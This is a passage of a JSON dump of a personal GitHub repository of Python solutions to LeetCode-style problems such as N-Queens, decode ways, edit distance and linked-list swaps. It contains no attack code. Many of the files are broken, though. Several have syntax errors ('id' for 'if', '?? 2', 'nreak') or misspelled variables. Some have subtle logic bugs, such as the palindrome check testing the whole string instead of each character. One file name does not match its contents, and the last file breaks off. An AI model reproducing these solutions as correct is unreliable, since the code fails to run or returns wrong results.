col_count>1:\n\t\t\treturn False\n\n\treturn True\n\n" }, { "alpha_fraction": 0.6326530575752258, "alphanum_fraction": 0.6530612111091614, "avg_line_length": 20.61111068725586, "blob_id": "3693a33c58410d3504001621054b4ddbcaa0a89c", "content_id": "dfc8a11ce46c0962588bdd661325b098ab08d76b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 37, "num_lines": 18, "path": "/Part2/Swap_Node_In_Paris.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution(object):\n\tdef swapParis(self, head):\n\t\tprev = ListNode(-1)\n\t\tprev.next = head\n\t\ttemp = prev\n\t\twhile temp.next and temp.next.next:\n\t\t\tnode1 = temp.next\n\t\t\tnode2 = temp.next.next\n\t\t\ttemp.next = node2\n\t\t\tnode1.next = node2.next\n\t\t\tnode2.next = node1\n\t\t\ttemp = temp.next.next\n\t\treturn prev.next\n\t\t\n" }, { "alpha_fraction": 0.5209125280380249, "alphanum_fraction": 0.5665399432182312, "avg_line_length": 19.076923370361328, "blob_id": "98ec6c64c0f6711225cd0ec422543b9ffefe7523", "content_id": "afb5217bd7da025048f0a329b71cb88b3af1b168", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 43, "num_lines": 13, "path": "/Part4/Minimum_Path_Sum_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef plusOne(self, digits):\n\t\tcarry = 1\n\t\tfor i in range(len(digits) - 1, -1, -1):\n\t\t\tdigits[i] += carry\n\t\t\tif digits[i] < 10:\n\t\t\t\tcarry = 0\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tdigits[i] -= 10\n\t\tif carry == 1:\n\t\t\tdigits.insert(0, 1)\n\t\treturn digits\n\t\t" }, { "alpha_fraction": 0.6427184343338013, "alphanum_fraction": 0.6466019153594971, "avg_line_length": 23.571428298950195, "blob_id": "1400c2d7026cf0bdd6e5cbd12799844398e7b024", "content_id": "6c49c866a1cbe899395572797f5c8546cb1b4fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 515, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/Part3/Populating_Next_Right_Pointers_In_Each_Node.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeLinkNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.next = None\nclass Solution(object):\n\tdef connect(self, root):\n\t\tif not root:\n\t\t\treturn\n\t\tcurrent_level = [root]\n\t\twhile current_level:\n\t\t\tnext_level = []\n\t\t\tfor node in current_level:\n\t\t\t\tif node.left:\n\t\t\t\t\tnext_level.append(node.left)\n\t\t\t\tif node.right:\n\t\t\t\t\tnext_level.append(node.right)\n\t\t\tfor i in range(len(next_level) - 1):\n\t\t\t\tnext_level[i].next = next_level[i + 1]\n\t\t\tcurrent_level = next_level" }, { "alpha_fraction": 0.6567164063453674, "alphanum_fraction": 0.6660447716712952, "avg_line_length": 24.428571701049805, "blob_id": "82c1a1f2036b7c8624fa46fac9fd99e2b7cc45ef", "content_id": "e4bc808c31337c86eb870c83a7d27112700e3b95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "no_license", "max_line_length": 57, "num_lines": 21, "path": "/Part2/Binary_Tree_Maximum_Path_Sum.py", "repo_name": "SreecharanG/Personal_Work", 
"src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef maxPathSum(self, root):\n\t\tself.maxSum = float('-inf')\n\t\tself._maxPathSum(root)\n\t\treturn self.maxSum\n\n\tdef _maxPathSum(self, root):\n\t\tif root is None:\n\t\t\treturn 0\n\t\tleft = self._maxPathSum(root.left)\n\t\tright = self._maxPathSum(root.right)\n\t\tleft = left if left > 0 else 0\n\t\tright = right if right > 0 else 0\n\t\tself.maxSum = max(self.maxSum, root.val + left + right)\n\t\treturn max(left, right) + root.val\n\t\t" }, { "alpha_fraction": 0.5682210922241211, "alphanum_fraction": 0.5785837769508362, "avg_line_length": 30.83333396911621, "blob_id": "8f1fcd32d4ad81d8d67a7aa214173b0e0b30512f", "content_id": "13fe7c17eb16163767429eabf736d362467f3933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 86, "num_lines": 18, "path": "/Part2/N_Queens_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef totalNQueens(self, n):\n\t\tself.com = [False] * n\n\t\tself.diag = [False] * (2 * n)\n\t\tself.anti_diag = [False] * (2 * n)\n\t\tself.result = 0\n\t\tself.recursive(0, n)\n\t\treturn self.result\n\n\tdef recursive(self, row, n):\n\t\tif row == n:\n\t\t\tself.result += 1\n\t\telse:\n\t\t\tfor i in range(n):\n\t\t\t\tif not self.col[i] and not self.diag[row + i] and not self.anti_diag[n - i + row]:\n\t\t\t\t\tself.col[i] = self.diag[row + i] = self.anti_diag[n - i + row] = True\n\t\t\t\t\tself.recursie(row + 1, n)\n\t\t\t\t\tself.col[i] = self.diag[row + i] = self.anti_diag[n - i + row] = False\n\t\t\t\t\t\n" }, { "alpha_fraction": 0.6455026268959045, "alphanum_fraction": 0.6472663283348083, "avg_line_length": 20.730770111083984, "blob_id": "0c1f45082f760cd16d70be4be607b07d41f66c8d", "content_id": "f75eb3b551948133c16ae1097b4dd34741d093aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 69, "num_lines": 26, "path": "/Part1/Remove_Duplicates_From_Sorted_List_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\t\tdef mu_print(self):\n\t\t\tprint(self.val)\n\t\t\tif self.next:\n\t\t\t\tprint(self.next.val)\n\n\nclass Solution(object):\n\tdef deleteDuplicates(self, head):\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tcurr = dummy\n\t\tis_repeat = False\n\t\twhile curr.next:\n\t\t\twhile curr.next.next and curr.next.val == curr.next.next.next.val:\n\t\t\t\tcurr.next = curr.next.next\n\t\t\t\tis_repeat = True\n\t\t\tif is_repeat:\n\t\t\t\tcurr.next = curr.next.next\n\t\t\t\tis_repeat = False\n\t\t\telse:\n\t\t\t\tcurr = curr.next\n\t\treturn dummy.next\n\t\t" }, { "alpha_fraction": 0.530927836894989, "alphanum_fraction": 0.5567010045051575, "avg_line_length": 23, "blob_id": "3aff44d0e604b38302cc46e16d06a4006e5aee34", "content_id": "3ae551adec214a1802f3b04ae5e82e87605208b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/Part3/Excel_Sheet_Column_Number.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class 
Solution(object):\n\tdef titleToNumber(self, s):\n\t\tbase = ord('A') - 1\n\t\tn = len(s)\n\t\tresult = 0\n\t\tfor i in range(n):\n\t\t\tresult += (ord(s[n - 1 - i]) - base) * pow(26, i)\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6299212574958801, "alphanum_fraction": 0.6430445909500122, "avg_line_length": 20.08333396911621, "blob_id": "405e1f6b128160ed4fd7254f2bf9e1d950799cec", "content_id": "3bad19ceea9de0d87637b5a743984e8304b4b779", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "permissive", "max_line_length": 50, "num_lines": 36, "path": "/Part4/Insersection_Of_Two_Linked_Lists.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution(object):\n\tdef getIntersectionNode(self, headA, headB):\n\t\tnodeA, nodeB = headA, headB\n\t\twhile nodeA != nodeB:\n\t\t\tnodeA = nodeA.next if nodeA else nodeB\n\t\t\tnodeB = nodeB.next if nodeB else nodeA\n\n\t\treturn nodeA\n\n\tdef getIntersectionNode_diff(self, headA, headB):\n\t\tdef get_length(node):\n\t\t\tlength = 0\n\t\t\twhile node:\n\t\t\t\tnode = node.next\n\t\t\t\tlenght += 1\n\t\t\treturn length \n\n\t\tlen1 = get_length(headA)\n\t\tlen2 = get_length(headB)\n\n\t\tif len1 > len2:\n\t\t\tfor __ in range(len1 - len2):\n\t\t\t\theadA = headA.next\n\t\telse:\n\t\t\tfor __ in range(len2 - len1):\n\t\t\t\theadB = headB.next\n\t\twhile headA:\n\t\t\tif headA == headB:\n\t\t\t\treturn headA\n\t\t\theadA = headA.next\n\t\t\theadB = headB.next\n\t\t\t" }, { "alpha_fraction": 0.6282608509063721, "alphanum_fraction": 0.634782612323761, "avg_line_length": 17.440000534057617, "blob_id": "8c07257c6d1f4da57dbff33e675a0ae143e2edcb", "content_id": "2e107164fcf68a2d78fa8a584c31bf06d9e34deb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 37, "num_lines": 25, "path": "/Part2/Remove_Nth_Node_From_The_End_of_the_list.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\n\tdef myPrint(self):\n\t\tif self.next:\n\t\t\tself.next.myPrint()\n\nclass Solution(object):\n\tdef removeNthFromEnd(self, head, n):\n\t\tif not head:\n\t\t\treturn head\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tprev = dummy\n\t\tcur = dummy\n\t\twhile prev and n >= 0:\n\t\t\tprev = prev.next\n\t\t\tn -= 1\n\t\twhile prev:\n\t\t\tprev = prev.next\n\t\t\tcur = cur.next\n\t\tcur.next = cur.next.next\n\t\treturn dummy.next" }, { "alpha_fraction": 0.4617563784122467, "alphanum_fraction": 0.5212464332580566, "avg_line_length": 28.5, "blob_id": "359b3268f0b5b92284745829fe53f702f87da329", "content_id": "607d461f6f704da7535244296a1154c4d9c3f393", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 73, "num_lines": 12, "path": "/Part2/Decode_Ways.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef numDecodings(self, s):\n\t\tlength = len(s)\n\t\tif length == 0:\n\t\t\treturn 0\n\t\tdp = [0 for __ in range(length + 1)]\n\t\tdp[length] = 1\n\t\tdp[length - 1] = 1 id s[length - 1] != '0' else 0\n\t\tfor i in range(length - 2, -1, -1):\n\t\t\tif s[i] != '0':\n\t\t\t\tdp[i] 
= dp[i + 1] + dp[i + 2] if int(s[i:i + 2]) <= 26 else dp[i + 1]\n\t\treturn dp[0]" }, { "alpha_fraction": 0.5990453362464905, "alphanum_fraction": 0.6157518029212952, "avg_line_length": 41, "blob_id": "2071cf87b108e553bb8ab32e4c5cfa70ede9bcad", "content_id": "11035f662cbae5b5f324b07c775bdabae82af395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "no_license", "max_line_length": 119, "num_lines": 10, "path": "/Part1/Rotate_Image.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef rotate(self, matrix):\n\t\tn = len(matrix)\n\t\tfor row in range(n):\n\t\t\tfor column in range(n - row):\n\t\t\t\tmatrix[row][column], matrix[n - 1 - column][n - 1 - row] = matrix[n - 1 - column][n - 1 - row], matrix[row][column]\n\t\tfor row in range(n // 2):\n\t\t\tfor column in range(n):\n\t\t\t\tmatrix[row][column], matrix[n - 1 - row][column] = matrix[n - 1 - row][column], matrix[row][column]\n\t\treturn matrix" }, { "alpha_fraction": 0.6354514956474304, "alphanum_fraction": 0.6404682397842407, "avg_line_length": 34.05882263183594, "blob_id": "5d457eaa5faf514ff2d04cee1db91e4fafbe2e35", "content_id": "c32497d391167630ea655605b0491a16e1c73658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "no_license", "max_line_length": 58, "num_lines": 17, "path": "/Part2/Insert_Interval.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class interval(object):\n\tdef __init__(self, s=0, e=0):\n\t\tself.start = s\n\t\tself.end = e\n\n\tdef __str__(self):\n\t\treturn \"[\" + str(self.start) + \",\" + str(self.end) + \"]\"\nclass Solution(object):\n\tdef insert(self, intervals, newInterval):\n\t\tstart, end = newInterval.start, newInterval.end\n\t\tleft = list(filter(lambda x: x.end < start, intervals))\n\t\tright = list(filter(lambda x: x.start > end, intervals))\n\t\tif len(left) + len(right) != len(intervals):\n\t\t\tstart = min(start, intervals[len(left)].start)\n\t\t\tend = max(end, intervals[-len(right) - 1].end)\n\n\t\treturn left + [interval(start, end)] + right\n\t\t" }, { "alpha_fraction": 0.6123595237731934, "alphanum_fraction": 0.6198501586914062, "avg_line_length": 23.18181800842285, "blob_id": "b5197dffca541f0b8a3e233b1bb7911fc5c14cd0", "content_id": "d01a75c950725e5b85b86e225207fbe6f672555e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 54, "num_lines": 22, "path": "/Part2/Word_Ladder 2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef ladderLength(self, beginWord, endWord, wordList):\n\t\twordList.add(endWord)\n\t\tcur_level = [beginWord]\n\t\tnext_level = []\n\t\tdepth = 1\n\t\tn = len(beginWord)\n\t\twhile cur_level:\n\t\t\tfor item in cur_level:\n\t\t\t\tif item == endWord:\n\t\t\t\t\treturn depth\n\t\t\t\tfor i in range(n):\n\t\t\t\t\tfor c in 'abcdefghijklmnopqrstuvwxyz':\n\t\t\t\t\t\tword = item[:i] + c +item[i + 1:]\n\t\t\t\t\t\tif word in wordList:\n\t\t\t\t\t\t\twordList.remove(word)\n\t\t\t\t\t\t\tnext_level.append(word)\n\n\t\t\tdepth += 1\n\t\t\tcur_level = next_level\n\t\t\tnext_level = []\n\t\treturn 0\n\t\t" }, { "alpha_fraction": 0.45812806487083435, "alphanum_fraction": 0.4926108419895172, "avg_line_length": 21.33333396911621, "blob_id": 
"c18d4453031a7b52fabe94d626d75eb4c66f53a4", "content_id": "7ac2f798c0273921d54f1f90a38b0aab66190e31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 203, "license_type": "no_license", "max_line_length": 33, "num_lines": 9, "path": "/Part2/Unique_Binary_Search_Trees.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef numTrees(self, n):\n\t\tdp = [1 for __ in range(n + 1)]\n\t\tfor i in range(2, n + 1):\n\t\t\ts = 0\n\t\t\tfor j in range(i):\n\t\t\t\ts += dp[j] * dp[i - 1 - j]\n\t\t\tdp[i] = s\n\t\treturn dp[-1]\n\t\t" }, { "alpha_fraction": 0.4585365951061249, "alphanum_fraction": 0.507317066192627, "avg_line_length": 17.727272033691406, "blob_id": "ac40ddd629e0a32b14024e99b64255eb574506b4", "content_id": "d6c6644cb2559fbc2c80a87a9581689af4064516", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "permissive", "max_line_length": 31, "num_lines": 11, "path": "/Part4/Climbing_Stairs.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef climStairs(self, n):\n\t\tif n <= 2:\n\t\t\treturn n \n\n\t\tdp = [0 for __ in range(n)]\n\t\tdp[0] = 1\n\t\tdp[1] = 2\n\t\tfor i in range(2, n):\n\t\t\tdp[i] = dp[i - 1]+ dp[i - 2]\n\t\treturn dp[n - 1]" }, { "alpha_fraction": 0.5619718432426453, "alphanum_fraction": 0.608450710773468, "avg_line_length": 16.674999237060547, "blob_id": "564f602e91ec1a23cb5d9ca97c032bd127cc3fff", "content_id": "8c77952ce09717889bc9bb389f94f2ab9ff9e3a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 710, "license_type": "no_license", "max_line_length": 40, "num_lines": 40, "path": "/Part3/Add_TwoNumbers.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\n\tdef myPrint(self):\n\t\tprint(self.val)\n\t\tif self.next:\n\t\t\tself.next.myPrint()\n\nclass Solution(object):\n\tdef addTwoNumbers(self, l1, l2):\n\t\tresult = ListNode(0)\n\t\tcurr = result\n\t\twhile l1 or l2:\n\t\t\tcurr.val += self.addTwoNodes(l1, l2)\n\t\t\tif curr.val >= 10:\n\t\t\t\tcurr.val -= 10\n\t\t\t\tcurr.next = ListNode(1)\n\t\t\telse:\n\t\t\t\tif l1 and l1.next or l2 and l2.next:\n\t\t\t\t\tcurr.next = ListNode(0)\n\t\t\tcurr = curr.next\n\t\t\tif l1:\n\t\t\t\tl1 = l1.next\n\t\t\tif l2:\n\t\t\t\tl2 = l2.next\n\t\treturn result\n\n\tdef addTwoNodes(self, n1, n2):\n\n\t\tif not n1 and not n2:\n\t\t\tNone\n\n\t\tif not n1:\n\t\t\treturn n2.val\n\t\tif not n2:\n\t\t\tresult n1.val\n\n\t\treturn n1.val + n2.val\n\t\t\n" }, { "alpha_fraction": 0.6178861856460571, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 18.774192810058594, "blob_id": "f72aef3eb4d2d654cd11f81965ac52d1563e63be", "content_id": "3d7346fd834fd96868f07d03d44ffee42d0a344d", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "permissive", "max_line_length": 65, "num_lines": 31, "path": "/Part4/Recover_Binary_Search_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef __init__(self):\n\t\tself.node1 = None\n\t\tself.node2 = 
None\n\t\tself.pre = None\n\n\n\tdef recoverTree(self, root):\n\t\tself._scan(root)\n\t\tself.node1.val, self.node2.val = self.node2.val, self.node1.val\n\n\n\tdef _scan(self, root):\n\t\tif root is None:\n\t\t\treturn\n\t\tself._scan(root.left)\n\t\tif self.pre is not None:\n\t\t\tif root.val < self.pre.val:\n\t\t\t\tif self.node1 is None:\n\t\t\t\t\tself.node1 = self.pre\n\t\t\t\t\tself.node2 = root\n\t\t\t\telse:\n\t\t\t\t\tself.node2 = root\n\t\tself.pre = root\n\t\tself._scan(root.right)\n\t\t" }, { "alpha_fraction": 0.6100628972053528, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 27.727272033691406, "blob_id": "3451855eb2116ca24455398d5b35fb6724cc7bf7", "content_id": "d88f4991214fbcafd4f4863f883098f94292e42b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/Part1/Subsets_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef subsetswithDup(self, nums):\n\t\tresult = [[]]\n\t\tnums.sort()\n\t\ttemp_size = 0\n\t\tfor i in range(len(nums)):\n\t\t\tstart = temp_size if i >- 1 and nums[i] == nums[i - 1] else 0\n\t\t\ttemp_size = len(result)\n\t\t\tfor j in range(start, temp_size):\n\t\t\t\tresult.append(result[j] + nums[i])\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5982404947280884, "alphanum_fraction": 0.607038140296936, "avg_line_length": 17.77777862548828, "blob_id": "5be0287c8367ea7a77e5109d797779beb5870156", "content_id": "af7bb0561584df02ac892b90c976418d92fa93a0", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "permissive", "max_line_length": 32, "num_lines": 18, "path": "/Part4/Rotate_List.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef rotateRight(self, head, k):\n\t\tif not head:\n\t\t\treturn []\n\t\tcurr = head\n\t\tlength = 1\n\t\twhile curr.next:\n\t\t\tcurr = curr.next\n\t\t\tlength += 1\n\t\tcurr.next = head\n\t\tcur = head\n\t\tshift = length - k % length\n\t\twhile shift > - :\n\t\t\tcurr = curr.next\n\t\t\tshift -= 1\n\t\tresult = curr.next\n\t\tcurr.next = None\n\t\treturn result\n\t\t\n" }, { "alpha_fraction": 0.6552795171737671, "alphanum_fraction": 0.6552795171737671, "avg_line_length": 17.647058486938477, "blob_id": "ebfee03af3ef2a43a004c4c52ed6e73cb6f235b5", "content_id": "dc3d669d016b10596b9463bd53484cdc4f32013b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 28, "num_lines": 17, "path": "/Part1/Binary_Search_Tree_Iterator.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class BSTIterator(object):\n\tdef __init__(self, root):\n\t\tself.stack = []\n\t\tself._pushLeft(root)\n\n\tdef hasNext(self):\n\t\treturn self.stack\n\n\tdef next(self):\n\t\tnode = self.stack.pop()\n\t\tself._pushLeft(node.right)\n\t\treturn node.val\n\n\tdef _pushLeft(self, node):\n\t\twhile node:\n\t\t\tself.stack.append(node)\n\t\t\tnode = node.left \n\n\t\t\t" }, { "alpha_fraction": 0.426763117313385, "alphanum_fraction": 0.49547919631004333, "avg_line_length": 31.58823585510254, "blob_id": "55fe8e6d26556c1842ced7ec75395829a397b1ad", "content_id": "0f9c8d0b46630140e86251ae30006258dc351c89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 70, "num_lines": 17, "path": "/Part3/Dungeon_Game.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef calculateMinimumHp(self, dungeon):\n\t\tn = len(dungeon)\n\t\tm = len(dungeon[0])\n\t\tdp = [[0 for __ in range(m)] for __ in range(n)]\n\t\tdp[-1][-1] = 1 if dungeon[-1][-1] > 0 else 1 - dungeon[-1][-1]\n\n\t\tfor i in range(m - 2, -1, -1):\n\t\t\tdp[-1][i] = max(1, dp[-1][i + 1] - dungeon[-1][i])\n\n\t\tfor j in range(n - 2, -1, -1):\n\t\t\tdp[j][-1] = max(1, dp[j + 1][-1] - dungeon[j][-1])\n\n\t\tfor j in range(n - 2, -1, -1):\n\t\t\tfor i in range(m - 2, -1, -1):\n\t\t\t\tdp[j][i] = max(min(dp[j + 1][i], dp[j][i + 1]) - dungeon[j][i], 1)\n\t\treturn dp[0][0]" }, { "alpha_fraction": 0.6858974099159241, "alphanum_fraction": 0.692307710647583, "avg_line_length": 37.5, "blob_id": "eacbf85b6c302d5ca9044c2f32908e9d50285e61", "content_id": "1fec6a1bd7ab1a321b63d43fba90fb9690fbc7b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/Part2/Valid_Palindrom.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef isPalindrome(self, s):\n\t\talphanumerics = [c for c in s.lower() if s.isalnum()]\n\t\treturn alphanumerics == alphanumerics[::-1]\n\t\t" }, { "alpha_fraction": 0.6407766938209534, "alphanum_fraction": 0.643203854560852, "avg_line_length": 20.736841201782227, "blob_id": "2dafdfc3a9171ae3e587c3bfdcbc9ba89fcbd1e0", "content_id": "87fc043c9fde5824eb2a8baf6c5ec4085355ac2f", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "permissive", "max_line_length": 33, "num_lines": 19, "path": "/Part4/Populating_Next_Right_Pointers_in_Each_Node_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeLinkNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.next = None\n\nclass Solution(object):\n\tdef connect(self, root):\n\t\tdummy = TreeLinkNode(-1)\n\t\tnode = dummy\n\t\twhile root:\n\t\t\twhile root:\n\t\t\t\tnode.next = root.left\n\t\t\t\tnode = node.next or node\n\t\t\t\tnode.next = root.right\n\t\t\t\tnode = node.next or node\n\t\t\t\troot = root.next\n\t\t\troot, node = dummy.next, dummy" }, { "alpha_fraction": 0.6305084824562073, "alphanum_fraction": 0.6440678238868713, "avg_line_length": 21.538461685180664, "blob_id": "cec1aa3931738698defe208e334ff3a536da6163", "content_id": "139049645a874263de2f5a5698aa99039a655336", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 37, "num_lines": 13, "path": "/Part2/Best_Time_To_Buy_And_Sell_Stock.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maxProfit(self, prices):\n\t\tif len(prices) < 2:\n\t\t\treturn 0\n\n\t\tmin_price = prices[0]\n\t\tmax_profit = 0\n\t\tfor price in prices:\n\t\t\tif price < min_price:\n\t\t\t\tmin_price = price\n\t\t\tif price = min_price > max_profit:\n\t\t\t\tmax_profit = price - min_price\n\t\treturn max_profit\n\t\t" }, { "alpha_fraction": 0.545171320438385, "alphanum_fraction": 0.5623052716255188, "avg_line_length": 21.85714340209961, 
"blob_id": "ec34812a9089faa832be37385efbb7145ec85548", "content_id": "b69ddb1bca719789fd98504e941c55dedc776f01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 642, "license_type": "no_license", "max_line_length": 77, "num_lines": 28, "path": "/Part1/Search_or_A_Range.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef searchRange(self, nums,target):\n\t\tresult = []\n\t\tlength = len(nums)\n\t\tstart = 0\n\t\tend = length\n\t\twhile start < end:\n\t\t\tmid = (start + end) ?? 2\n\t\t\tif nums[mid] == target and (mid == 0 or nums[mid - 1] != target):\n\t\t\t\tresult.append(mid)\n\t\t\t\tbreak\n\t\t\tif nums[mid] < target:\n\t\t\t\tstart = mid + 1\n\t\t\telse:\n\t\t\t\tend = mid\n\t\tif not result:\n\t\t\treturn [-1, -1]\n\t\tend = length\n\t\twhile start < end:\n\t\t\tmid = (start + end) // 2\n\t\t\tif nums[mid] == target and (mid == length - 1 or nums[mid + 1] != target):\n\t\t\t\tresult.append(mid)\n\t\t\t\tnreak\n\t\t\tif nums[mid] <= target:\n\t\t\t\tstart = mid + 1\n\t\t\telse:\n\t\t\t\tend = mid\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.4395604431629181, "alphanum_fraction": 0.4989010989665985, "avg_line_length": 29.133333206176758, "blob_id": "f1c2fd3b48dfb3c4e8171519a2a82c2a74e0e372", "content_id": "590e96f985a3e5bb6531cb1e5b7779ae549f8c7e", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "permissive", "max_line_length": 82, "num_lines": 15, "path": "/Part4/Edit_distance.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef minDistance(self, word1, word2):\n\t\tm = len(word1)\n\t\tn = len(word2)\n\n\t\tdp = [[0 for __ in range(m + 1)] for __ in range( n + 1)]\n\t\tfor j in range(m + 1):\n\t\t\tdp[0][j] = j\n\t\tfor i in range(n + 1):\n\t\t\tdp[i][0] = i\n\t\tfor i in range(1, n + 1):\n\t\t\tfor j in range(1, m + 1):\n\t\t\t\tonemore = 1 if word1[j - 1] != word2[i - 1] else 0\n\t\t\t\tdp[i][j] = min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, do[i - 1][j - 1] + onemore)\n\t\treturn dp[n][m]\n\t\t\n" }, { "alpha_fraction": 0.511040985584259, "alphanum_fraction": 0.5457413196563721, "avg_line_length": 25.25, "blob_id": "08f28acfcf04e456c90b2244bbbcbed1af0f7416", "content_id": "ed53c2ade0849b0ba00e1946696f4c8b13f2b125", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "permissive", "max_line_length": 46, "num_lines": 12, "path": "/Part4/Candy.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef candy(self, ratings):\n\t\tn = len(ratings)\n\t\tcandy = [1] * n\n\t\tfor i in range(1, n):\n\t\t\tif ratings[i] > ratings[i - 1]:\n\t\t\t\tcandy[i] = candy[i - 1] + 1\n\n\t\tfor i in range(n - 2, -1, -1):\n\t\t\tif ratings[i] > ratings[i + 1]:\n\t\t\t\tcandy[i] = max(candy[i], candy[i + 1] 